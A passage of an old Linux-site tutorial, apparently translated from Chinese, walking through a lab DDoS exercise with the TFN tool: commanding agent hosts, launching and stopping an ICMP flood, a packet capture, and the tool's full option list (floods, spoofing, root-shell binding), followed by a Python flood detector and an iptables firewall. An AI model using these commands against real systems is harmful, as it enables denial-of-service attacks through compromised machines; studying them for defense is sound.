<br>
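6. The attack begins (a painful memory replays...)<br>
<br>
Back on master (192.168.0.6), getting ready for the exercise...<br>
<br>
<br>
[root@master root]# touch host.txt<br>
// Create a file that records the agents (if you are bored enough, you may end up with a lot of compromised hosts acting as<br>
// agents, and you will forget them unless you write them down.)<br>
[root@master root]# echo "192.168.0.2" > host.txt    // add ag1, which has already run td, to host.txt<br>
[root@master root]# echo "192.168.0.3" >> host.txt   // append ag2 to host.txt<br>
<br>
First, test the connection.<br>
<br>
[root@master root]# ./tfn -f host.txt -c 10 -i "mkdir wjpfjy"    // contact the agents listed in host.txt and have them run the command mkdir wjpfjy, i.e. create a directory<br>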
<br>
<br>
Protocol : random<br>
Source IP : random<br>
Client input : list<br>
Command : execute remote command<br>
<br>
Password verification: <br>
// Here you are prompted for a password, the one entered at compile time; if it is wrong, communication with the td process is not possible<br>
<br>
Sending out packets: ..<br>
<br>
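Check on ag1 and ag2 whether a directory named wjpfjy was created. It normally sits in the same directory as td; if you are not sure, you can look for it with find / -name wjpfjy -print.<br>
<br>
[root@master root]# ./tfn -f host.txt -c 6 -i 192.168.0.5    // start the ICMP/PING attack on aim...<br>
(My poor P4: in under 5 minutes it was as slow as a 386.) Still, before it was game over it struggled through recording the attack data, so it was worth the N thousand yuan I paid for it. This is the tcpdump capture:<br>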
<br>
<br>
[root@aim root]# tcpdump -r pack.atta -c 4 -xX<br>
08:03:36.524907 23.43.171.0 > 192.168.0.5 icmp: echo request [ttl 0]<br>
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e........+..<br>
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ................<br>
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0050 0000 ..<br>
08:03:36.524933 192.168.0.5 > 23.43.171.0: icmp: echo reply<br>
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E......@.Q.....<br>
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000 .+..............<br>
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0050 0000 ..<br>
08:03:36.524944 36.235.130.0 > 192.168.0.5: icmp: echo request [ttl 0]<br>
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e......n$...<br>
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ................<br>
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0050 0000 ..<br>
08:03:36.524984 192.168.0.5 > 36.235.130.0: icmp: echo reply<br>
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U...@.......<br>
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $...............<br>
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
<br>
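As an added example (not part of the original article), the following Python reads tcpdump summary lines in the format shown above and flags a destination that receives echo requests from several distinct sources within a short window, also counting requests captured with ttl 0. The names parse and flood_suspects, the thresholds and the sample lines are assumptions made for the illustration.<br>

```python
import re
from collections import defaultdict

# tcpdump summary line for an ICMP echo request. The colon after the
# destination is optional because the capture above shows both forms.
LINE = re.compile(
    r"^(\d\d):(\d\d):(\d\d)\.(\d+) (\d+\.\d+\.\d+\.\d+) > "
    r"(\d+\.\d+\.\d+\.\d+):? icmp: echo request(?: \[ttl (\d+)\])?")

def parse(line):
    """Return (seconds, src, dst, ttl-or-None) for an echo request, else None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    h, mi, s, frac, src, dst, ttl = m.groups()
    t = int(h) * 3600 + int(mi) * 60 + int(s) + float("0." + frac)
    return t, src, dst, (int(ttl) if ttl is not None else None)

def flood_suspects(lines, window=1.0, min_sources=3):
    """Report destinations pinged by >= min_sources distinct sources
    within any window-second span (thresholds are assumptions to tune)."""
    per_dst = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        per_dst[rec[2]].append(rec)
    report = {}
    for dst, recs in per_dst.items():
        recs.sort(key=lambda r: r[0])
        start = peak = 0
        for end in range(len(recs)):
            while recs[end][0] - recs[start][0] > window:
                start += 1
            peak = max(peak, len({r[1] for r in recs[start:end + 1]}))
        if peak >= min_sources:
            report[dst] = {"peak_sources": peak, "requests": len(recs),
                           "ttl0": sum(r[3] == 0 for r in recs)}
    return report

# Constructed sample in the format of the capture above (RFC 5737 sources).
SAMPLE = [
    "08:03:36.524907 198.51.100.0 > 192.168.0.5 icmp: echo request [ttl 0]",
    "08:03:36.524933 192.168.0.5 > 198.51.100.0: icmp: echo reply",
    "08:03:36.524944 203.0.113.0 > 192.168.0.5: icmp: echo request [ttl 0]",
    "08:03:36.524990 192.0.2.0 > 192.168.0.5: icmp: echo request [ttl 0]",
    "08:03:37.100000 192.168.0.6 > 192.168.0.7: icmp: echo request",
    "08:03:38.300000 192.168.0.6 > 192.168.0.7: icmp: echo request",
]

if __name__ == "__main__":
    print(flood_suspects(SAMPLE))
```

Timestamps are treated as seconds within one day, so a capture that crosses midnight needs to be split first.<br>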
<br>
<br>
[root@master root]# ./tfn -f host.txt -c 0    // stop the attack<br>
<br>
<br>
Protocol : random<br>
Source IP : random<br>
Client input : list<br>
Command : stop flooding<br>
<br>
Password verification:<br>
<br>
Sending out packets: ...<br>
<br>
There are other attack methods as well; changing -c X selects a different one.<br>
<br>
<br>
[root@master root]# ./tfn<br>
usage: ./tfn <br>
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.<br>
Uses a random protocol as default<br>
[-D n] Send out n bogus requests for each real one to decoy targets<br>
[-S host/ip] Specify your source IP. Randomly spoofed by default, you need<br>
to use your real IP if you are behind spoof-filtering routers<br>
[-f hostlist] Filename containing a list of hosts with TFN servers to contact<br>
[-h hostname] To contact only a single host running a TFN server<br>
[-i target string] Contains options/targets separated by '@', see below<br>
[-p port] A TCP destination port can be specified for SYN floods<br>
<-c command ID> 0 - Halt all current floods on server(s) immediately<br>
1 - Change IP antispoof-level (evade rfc2267 filtering)<br>
usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)<br>
2 - Change Packet size, usage: -i <br>
3 - Bind root shell to a port, usage: -i <br>
4 - UDP flood, usage: -i victim@victim2@victim3@...<br>
5 - TCP/SYN flood, usage: -i victim@... [-p destination port]<br>
6 - ICMP/PING flood, usage: -i victim@...<br>
7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...<br>
8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...<br>
9 - TARGA3 flood (IP stack penetration), usage: -i victim@...<br>
10 - Blindly execute remote shell command, usage -i command<br>
<br>
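IV. Defenses<br>
<br>
As every article about DDoS on the net says, DDoS is all but impossible to defend against. I tried to protect my host by filtering out all ICMP packets at the firewall, but all that achieved was that my host crashed a little later. Sigh, don't count on me to stop DDoS; if I could, I wouldn't be losing sleep over it :(<br>
<br>
As the old saying goes, what we can do is keep our own hosts from becoming agents in someone else's attack and strictly restrict the packets leaving our intranet, so that we do as little harm to others as possible. Only if everyone does this can our network environment become a little safer; at the very least, I could sleep soundly for a few days.<br>
<br>
Attached is part of my firewall. It mainly targets ICMP/PING, though it is not much use :(<br>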
<br>
<br>
# Default policy: drop anything not explicitly accepted below<br>
/sbin/iptables -P INPUT DROP<br>
/sbin/iptables -A INPUT -i lo -p all -j ACCEPT<br>
/sbin/iptables -A INPUT -i eth1 -p icmp -j ACCEPT<br>
# Drop echo requests (ICMP type 8) on every interface not accepted above<br>
/sbin/iptables -A INPUT -p icmp --icmp-type 8 -j DROP<br>
/sbin/iptables -A INPUT -s 127.0.0.2 -i lo -j ACCEPT<br>
# Drop packets arriving on eth0 that claim a loopback, LAN or private source address<br>
/sbin/iptables -A INPUT -s 127.0.0.2 -i eth0 -j DROP<br>
/sbin/iptables -A INPUT -s $LAN_NET/24 -i eth0 -j DROP<br>
/sbin/iptables -A INPUT -s 172.16.0.0/12 -i eth0 -j DROP<br>
/sbin/iptables -A INPUT -s 10.0.0.0/8 -i eth0 -j DROP<br>
# Accept at most 1 packet/sec (burst 5) of any traffic on eth0; packets over the limit fall through to the rules below<br>
/sbin/iptables -A INPUT -i eth0 -m limit --limit 1/sec --limit-burst 5 -j ACCEPT<br>
/sbin/iptables -A INPUT -i eth0 -p udp -m state --state NEW -j REJECT<br>
/sbin/iptables -A INPUT -p tcp --dport 22 -j ACCEPT<br>
/sbin/iptables -A INPUT -p tcp --dport 80 -j ACCEPT<br>
/sbin/iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT<br>
/sbin/iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT<br>
/sbin/iptables -A INPUT -p tcp -i eth0 -m state --state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT<br>
/sbin/iptables -A INPUT -p udp -i eth0 -m state --state ESTABLISHED,RELATED -m udp --dport 1024: -j ACCEPT<br>
# As ordered, this LOG rule is never reached: echo requests are already accepted (lo, eth1) or dropped (--icmp-type 8 rule) above<br>
/sbin/iptables -A INPUT -p icmp --icmp-type echo-request -j LOG --log-level 2<br>
/sbin/iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j DROP<br>
/sbin/iptables -A INPUT -p tcp -m multiport --destination-port 135,137,138,139 -j LOG<br>
/sbin/iptables -A INPUT -p udp -m multiport --destination-port 135,137,138,139 -j LOG<br>
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT<br>
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT<br>
/sbin/iptables -A INPUT -p tcp -i eth1 -m state --state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT<br>
<br>
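The above is only what I have worked out through my own experimenting; please point out anything lacking or wrong. If you are able to prevent DDoS, please tell me too :) Because of the special nature of this article, please notify me before reposting. Thank you for your cooperation :)<br>
<br>
My thanks also go to sevenJ, who helped me draw up the firewall!<br>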
<br>
wjpfjy<br>
mail:wjpfjy@sohu.com<br>
QQ: 928395<br>
</FONT><br>
</TD>
</TR>
<TR>
<TD colSpan=2><FONT
class=middlefont></FONT><BR>
<FONT
class=normalfont>End of article</FONT> </TD>
</TR>
<TR>
<TD background="images/dot.gif" tppabs="http://www.linuxhero.com/docs/images/dot.gif" colSpan=2
height=10></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></DIV></TD>
<TD vAlign=top width="20%"
background="images/line.gif" tppabs="http://www.linuxhero.com/docs/images/line.gif" rowSpan=2>
<DIV align=center>
</DIV></TD></TR>
<TR vAlign=top>
<TD width="80%">
<DIV align=center><BR>
</DIV>
</TD></TR></TBODY></TABLE></TD></TR>
</TABLE></TD></TR>
</TABLE>
<TABLE cellSpacing=0 cellPadding=4 width="100%" bgColor=#eeeeee
border=0><TBODY>
<TR>
<TD width="50%">
<P><FONT class=middlefont>Copyright © 2004 <A
href="mailto:bjchenxu@sina.com">linux知识宝库</A><BR>
Violators will be prosecuted. </FONT></P>
</TD>
<TD width="50%">
<DIV align=right><FONT class=middlefont>Powered by: <A
href="mailto:bjchenxu@sina.com">Linux知识宝库</A> Version 0.9.0 </FONT></DIV>
</TD></TR></TBODY></TABLE>
<CENTER></CENTER></TD></TR>
</TABLE></CENTER></BODY></HTML>